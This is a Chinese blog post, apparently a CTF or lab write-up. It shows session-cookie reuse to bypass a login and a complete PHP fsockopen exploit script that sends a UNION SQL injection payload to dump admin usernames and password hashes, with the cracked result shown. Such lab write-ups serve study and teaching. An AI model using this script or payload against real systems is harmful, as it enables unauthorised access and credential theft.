渗透测试_需要验证的EXP编写

最新推荐文章于 2023-07-02 17:18:35 发布
最新推荐文章于 2023-07-02 17:18:35 发布
阅读量313 收藏
点赞数
分类专栏: CTF 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54227009/article/details/124850271
版权
本文介绍了通过fsockopen函数实现PHP会话劫持,详细解析了如何绕过登录验证并利用SQL注入漏洞获取账号密码。通过构造payload并设置自定义HTTP请求,成功获取到管理员的账号(admin)和MD5加密后的密码(123456)。此外,还展示了如何编写exploit脚本来自动化这个过程。
摘要由CSDN通过智能技术生成

记一次笔记

fsockopen — 打开一个网络连接或者一个Unix套接字连接

参数:hostname:网址        port:端口        errstr:错误返回信息        timeout:超时时间

 

靶机登录界面

登录成功界面

如果不登录直接访问main.php的话,是有账号密码验证的,是进不去的

因为界面有session 进行验证

 h4pb2rtsfrsihh8h629emrm9s4

所以抓包直接把session放进去试试

 这里没有输入账号和密码,直接把session放进去了,直接登录成功

所以开始写exp脚本把~

<?php

#网址
$site="10.32.4.234";

#注入语句

$payload="article.php?id=-1%20union%20select%201,2,group_concat(0x7e,username,0x3a,password,0x7e)%20from%20admin";

#session
$key ="PHPSESSID=pncn36ctuh4j6alpu9422ofhi1";

#自定义方法,参数为网址、构造的payload、session
function send_http($site,$payload,$key){

#调用php内置函数fsockopen
        $fp = fsockopen($site, 80, $errno, $errstr, 30);
        if (!$fp) {
                echo "$errstr ($errno)<br />\n";
        } else {

#抓包的内容
                $out = "GET /{$payload} HTTP/1.1\r\n";
                $out .= "Host:{$site} \r\n";
                $out .= "Connection: keep-alive\r\n\r\n";
                $out .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
                $out .="Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\n";
                $out .="Cookie:{$key}\r\n";
                fwrite($fp, $out);
                while (!feof($fp)) {
                        $resp .=  fgets($fp, 1024);
                }
                fclose($fp);
                return $resp;
        }
        
        
}

#调用函数
$html = send_http($site,$payload,$key);

if($html){

#正则匹配,如果有内容就返回数组为1的内容,否则抛错
        preg_match('/~(.*?)~/', $html,$m);
        if($m[1]){
                echo "[+]{$m[1]}[+]";
        }else{
                echo "[!]error[!]";
        }
        
}else{
                echo "[!]error[!]";
        }

?>

执行结果

账号:amdin

密码: e10adc3949ba59abbe56e057f20f883e

这里密码md5的,解密为:123456

跟我们sql手动注入的结果一样

 

 

鸡肋是鸡肋!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 5563
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXPExploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
渗透中 PoC、Exp、Payload、RCE、IOC,Shellcode 的区别
penriver的博客
11-12 2741
渗透中 PoC、Exp、Payload、RCE、IOC,Shellcode 的区别
渗透测试常用术语总结
xv66666的博客
07-02 2420
想象自己是一个特工,你的目标是监控一个重要的人,有一天你怀疑目标家里的窗子可能没有关,于是你上前推了推,结果推开了,这是一个POC。之后你回去了,开始准备第二天的渗透计划,第二天你通过同样的漏洞渗透进了它家,仔细查看了所有的重要文件,离开时还安装了一个隐蔽的录音笔,这一天你所做的就是一个EXP,你在他家所做的就是不同的Payload,就把录音笔当作Shellcode吧!
渗透中poc exp payload shellcode的具体含义(小宇特详解)
小宇的web博客
06-24 2012
渗透中poc exp payload shellcode的具体含义(小宇特详解) 具体含义 1.POC:全称 ’ Proof of Concept ',中文 ’ 概念验证 ’ ,常指一段漏洞证明的代码。 2.EXP:全称 ’ Exploit ',中文 ’ 利用 ',指利用系统漏洞进行攻击的动作。 3.Payload:中文 ’ 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 4.Shellcode:简单翻译 ’ shell代码 ',是Payload的一种,由于其建立正向/反向she
SE_JAVA_EXP_E046.zip
05-20
在"SE_JAVA_EXP_E046"中,可能涉及了如何正确地抛出和捕获异常,以及如何编写健壮的代码来防止程序因异常而中断。 多线程是Java的一个强项,允许程序同时执行多个任务。学生可能需要学习如何创建和管理线程,理解...
try_reg_exp_quicklyskd_测试正则表达式_
09-28
总的来说,"try_reg_exp_quicklyskd_测试正则表达式_" 提供的工具或程序旨在帮助开发者在编写正则表达式时进行快速验证,确保其正确性和效率。通过熟悉正则表达式的基本构造和操作,结合适当的测试工具,我们可以更...
用C实现exp函数.zip_exp_exp函数 c++实现_用C
09-22
标题“用C实现exp函数”和描述“用C实现exp函数”提示我们要探讨如何在C语言环境下编写自己的`exp`函数。C++实现可能更复杂,因为它可以利用模板、类和其他高级特性,但C语言的实现将更侧重于基础算法和数据结构。 ...
characterExpPoint.rar_exp_exp hack_mo siang
07-15
MO SIANG malaysia character exp hack
exp_proje.rar_exp verilog_verilog exp
09-23
本项目"exp_proje.rar_exp verilog_verilog exp"聚焦于Verilog语言在设计和验证数字系统中的应用,特别是与DEMULTIPLEXER(分路器)相关的实现。DEMULTIPLEXER是一种多输入、多输出的数字逻辑组件,它能将一个或多个...
exp缩写篇需要验证exp编写
yyj1781572的博客
10-31 282
有些都是使用payload直接访问攻击页面,而且不需要权限认证,能直接使用exp实现攻击。 如果需要登录认证 如登录后方可访问漏洞页面,像这种需要权限认证的漏洞页面,在平时测试也是非常的多,这篇就是讲exp如何编写
"empty": false 关于这个问题的解决
Harden3的博客
02-26 5089
这里的jsonObject返回结果是"empty": false,这是什么问题呢,来看看国外大佬怎么说: 下面是解决办法: 这个亲自测试了,可以解决。 他的意思就是不能直接创建json对象,而是得创建实体类,spring能将实体类转成json格式并返回。 spring使用jsonObject作为序列化器和反序列化器,但是如果你的对象直接是jsonObject了,spring反而不知道怎么去序列化...
今天exp的时候遇到一些问题:
cinashu1164的博客
03-02 376
起因是我要将正式库和测试库同步。早上exp了正式库,imp到测试库中。发现数据居然不是同步的,以前都没有遇到过类似的问题。请教了同事,得知:exp的时候使用了consistent = y。这个参数主要是为了保证在exp的时候使得...
渗透中POC、EXP、Payload与Shellcode的区别
热门推荐
浅浅的博客
06-17 4万+
1. POC、EXP、Payload与Shellcode POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:简单翻译 ' ...
渗透中Poc、Exp、Payload、Rce与Shellcode的区别
墨痕诉清风的博客
10-28 3723
备注:感谢原作者,本文只为备份学习资料。 PoC,全称”Proof of Concept”,中文“概念验证”,常指一段漏洞证明的代码。 Exp,全称”Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。 Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode,简单翻译“shell代码”,是Payload的一种,由于其建立正...
渗透测试中POC、EXP、Payload与Shellcode的区别
gaily123的博客
03-21 1429
POC、EXP、Payload与Shellcode POC,全称”Proof of Concept”,中文“概念验证”,常指一段漏洞证明的代码。 EXP,全称”Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。 Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode,简单翻译“shell代码”,是Payload的一种,由于其建立正向/反向shell而得名。 几点注意 PoC是用来证明漏洞存在的,Exp是用来利用漏洞的,两者通常不是.
渗透测试常用方法总结
MzHeader的博客
06-19 1万+
1 渗透流程 信息收集 漏洞验证/漏洞攻击 提权,权限维持 日志清理 其他 1 信息收集 一般先运行端口扫描和漏洞扫描获取可以利用的漏洞。多利用搜索引擎 端口扫描 有授权的情况下直接使用 nmap 、msscan 、自己写py脚本等端口扫描工具直接获取开放的端口和获取服务端的 banner 信息。 使用 Python 端口扫描的介绍 https://thief.one/2018/05/17/1...
exp/imp 测试
congtuan9646的博客
04-01 233
1.将用户manage的表source_test导入到test.(验证是否导入的表会在test用户的默认表空间下) exp userid=manage/manage file=source.dmp tables=sou...
ds_store_exp-master使用教程
最新发布
09-16
ds_store_exp-master是一种用于分析和利用.DS_Store文件的工具包。.DS_Store是Mac OS系统在文件夹中自动生成的隐藏文件,用于存储特定文件夹的自定义视图选项和元数据信息。ds_store_exp-master提供了一些功能,使用户能够查看和分析.DS_Store文件。 使用ds_store_exp-master的第一步是安装Python。在确保已经安装了python之后,可以从GitHub上下载ds_store_exp-master的源代码。然后,可以在命令行中导航到下载的文件所在的目录,并使用命令"python ds_store_exp.py"运行。 当程序运行后,用户会看到一个简单的命令行菜单,其中包含一些选项供用户选择。其中一个选项是"Extraction",允许用户从.DS_Store文件中提取有关文件夹和文件的信息。另一个选项是"Analysis",允许用户分析.DS_Store文件中的各种字段和标志位。用户还可以选择在指定的文件夹中创建自己的.DS_Store文件。 在提取信息或分析.DS_Store文件时,用户需要提供.DS_Store文件的路径。可以通过将.DS_Store文件拖放到命令行终端中,或手动输入.DS_Store文件的路径来完成。 使用ds_store_exp-master,您可以深入了解.DS_Store文件的内容,包括文件和文件夹的自定义视图选项、标签、图标位置等。这对于研究和理解.DS_Store文件的作用和功能非常有用。 总而言之,ds_store_exp-master是一个功能强大的工具包,可用于分析和利用.DS_Store文件。通过提供丰富的选项和功能,使用户能够深入了解.DS_Store文件的内容和功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值